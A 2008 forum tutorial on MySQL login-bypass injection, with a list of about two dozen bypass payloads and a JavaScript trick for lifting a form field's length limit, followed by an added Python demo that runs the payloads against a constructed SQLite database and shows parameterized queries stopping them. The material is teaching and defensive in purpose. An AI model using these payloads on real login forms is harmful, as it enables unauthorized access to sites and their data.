Basic Mysql Injection/Prevention


Post by AbaxHacker on Wed Aug 20, 2008 5:59 pm

Basic Mysql Injection
A tutorial by Abax

Introduction:
Many "script kiddies" out there try to use injections to their advantage. I will show you some simple injections, and some slightly more advanced ones, as well as how to protect yourself from these so-called "MySQL injections".

Requirements:
- Basic HTML knowledge
- Basic JavaScript knowledge
- Basic MySQL knowledge
- A site that is open to this attack, or make one =)

Basic Outline:
From time to time someone will try to attack your site, or heck, it could be you trying to use MySQL injection. Either way it comes down to the fact that you need to know how it works if you are big on site creation/development or maintenance/security. There are many types of attacks, but the worst, and possibly the easiest, would be a MySQL injection or a Server Side Include.

In this case let's say you made a site that uses MySQL to store/retrieve data, maybe for an administrator panel or a member login. Either way you need it to be secure for many reasons, so what is the best way to protect yourself? Some client-side protections and some server-side protections. But before we can think about protecting, we have to see how the attack is done.

The most common SQL injection known would be to go to an admin panel, plop in an injection and gain control of the site, which is a huge no-no. So how is this done? A couple of ways, heck, a lot. I will cover the basics here and some more advanced ones later on in a different tutorial.

So if we look at this code, what does it do to MySQL?

Code: Select all
'or''='


If you know some "MySQL scripting", you will know what this does: the first quote closes the string the application built around your input, and or ''='' adds a condition that is always true, so the WHERE clause matches every row instead of one username/password. Which field it lands in matters, because AND binds before OR, so the always-true condition must be OR'd onto the whole clause. The application usually takes the first row returned, which is often the admin account. So that's one, and there can be many; for example, a huge list I have:

Code: Select all
1'or'1'='1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

So you get the point: all it is doing is getting the query to select from the appropriate table with a condition that always holds. Now if we inject this into an admin login form we can very easily gain access, which isn't bad for Ctrl+C and Ctrl+V of this small code.

But there is a small problem: depending on the site, it may restrict certain characters or only give you 6 character spaces to work with. This is where some common sense, JavaScript injection and HTML coding come into play.

This is probably the most important part, except for the security. You will need some code to make the input's maxlength bigger, or to delete a JavaScript function that cleans the input, or even to get past the server-side checks, which is really hard because you cannot touch them from the browser. But to be nice I will explain some basic JavaScript injection so you can make some things work out; if you haven't, you should look at the nice JavaScript Injection tutorial, which explains it and the code.

Make the "password" maxlength value 30 (the DOM property is maxLength with a capital L; the all-lowercase spelling just sets an unrelated property and the limit stays in place):

Code: Select all
javascript:void(document.forms[0].password.maxLength=30)


Check it with:

Code: Select all
javascript:alert(document.forms[0].password.maxLength)

Most current browsers strip the javascript: prefix from a URL pasted into the address bar; the same expression typed into the developer console does the job.


Now that you have seen a basic way of exploiting some unsafe sites, how do you make yours safer? Mainly by blocking input, checking the referer URL, checking the length of fields, and making a server-side checker so that it's almost unbeatable. I will only cover a fraction, and this is where you have to code a simple JavaScript function that checks if the input is good and, based on that, returns an answer. I will not supply the code but give you the theory.

Check through every character and if the character is not a good character, for example ' " = < > etc., reject the input. Remember that a JavaScript check runs in the attacker's browser and can be removed the same way the maxlength was, so the same check has to be done again on the server.
AbaxHacker
New User
Posts: 17
Joined: Tue Aug 19, 2008 6:31 pm
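The bypass described in the post (the quote-and-or payloads and the admin'-- comment trick) and the prevention theory at the end, worked through as an added example that is not part of the original post. It runs the payloads against an in-memory SQLite database standing in for MySQL: SQLite accepts the same single-quoted literals and -- comments these payloads rely on, while MySQL's # comment is left out because SQLite does not understand it. The users table, the two accounts and their passwords are constructed for the demo. Three login handlers are compared: the vulnerable string-built query, the post's bad-character check moved to the server, and a parameterized query, which is the server-side check that actually holds.

```python
"""Added example: the post's login-bypass payloads and its prevention theory,
run against an in-memory SQLite database that stands in for MySQL.

SQLite accepts the same single-quoted string literals and '--' comments that
these payloads rely on. MySQL's '#' comment is not exercised because SQLite
does not understand it. Table, accounts and passwords are constructed here.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an admin row first, a member row second."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'Zq8!vL#2pWx', 'admin')")
    con.execute("INSERT INTO users VALUES ('bob', 'hunter2', 'member')")
    con.commit()
    return con


def build_vulnerable_query(username: str, password: str) -> str:
    """The pattern the post attacks: user input spliced straight into the SQL text."""
    return ("SELECT username, role FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> list:
    """Returns every row the WHERE clause matches; an application that takes
    the first row will 'log in' as whoever is stored first (here: admin)."""
    return con.execute(build_vulnerable_query(username, password)).fetchall()


# The post's "bad characters", plus the comment markers the payload list uses.
BAD_CHARS = set("'\"=<>;-#")


def login_filtered(con: sqlite3.Connection, username: str, password: str) -> list:
    """The post's suggested defence, done on the server: reject any field that
    contains a bad character. It stops these payloads, but it is a denylist,
    and it also rejects legitimate passwords that contain those characters."""
    if any(ch in BAD_CHARS for field in (username, password) for ch in field):
        return []
    return login_vulnerable(con, username, password)


def login_parameterized(con: sqlite3.Connection, username: str, password: str) -> list:
    """The fix that actually holds: the SQL text is constant and the values are
    bound separately, so a quote in the input is only ever a quote in a value."""
    return con.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


# (username, password) pairs. The 'or' payloads go in the password field so the
# always-true condition is OR'd onto the whole clause (AND binds before OR);
# the comment payload goes in the username field to cut the password check off.
PAYLOADS = {
    "quote-or-empty": ("", "' or ''='"),
    "comment-out-password": ("admin'--", "anything"),
    "or-1-equals-1": ("", "' or 1=1--"),
    "hi-or-a-equals-a": ("", "hi' or 'a'='a"),
    "legit-admin": ("admin", "Zq8!vL#2pWx"),
    "legit-member": ("bob", "hunter2"),
}


def run_demo() -> dict:
    """Maps each label to (rows matched by vulnerable, filtered, parameterized).
    A non-zero count for an attack payload is a bypass; a zero count for a
    legitimate login is a user the defence locked out."""
    con = make_db()
    results = {}
    for label, (user, pw) in PAYLOADS.items():
        results[label] = (
            len(login_vulnerable(con, user, pw)),
            len(login_filtered(con, user, pw)),
            len(login_parameterized(con, user, pw)),
        )
    return results


if __name__ == "__main__":
    print(build_vulnerable_query("", "' or ''='"))
    for label, (v, f, p) in run_demo().items():
        print(f"{label:22s} vulnerable={v} filtered={f} parameterized={p}")
```

Running it shows the quote-and-or payloads matching both rows of the vulnerable query, not just admin; the application "logs in as admin" only because it takes the first row. The character denylist blocks all four payloads but also rejects the real admin password, which contains a #, while the parameterized query lets both legitimate logins through and treats every payload as a value that matches nobody.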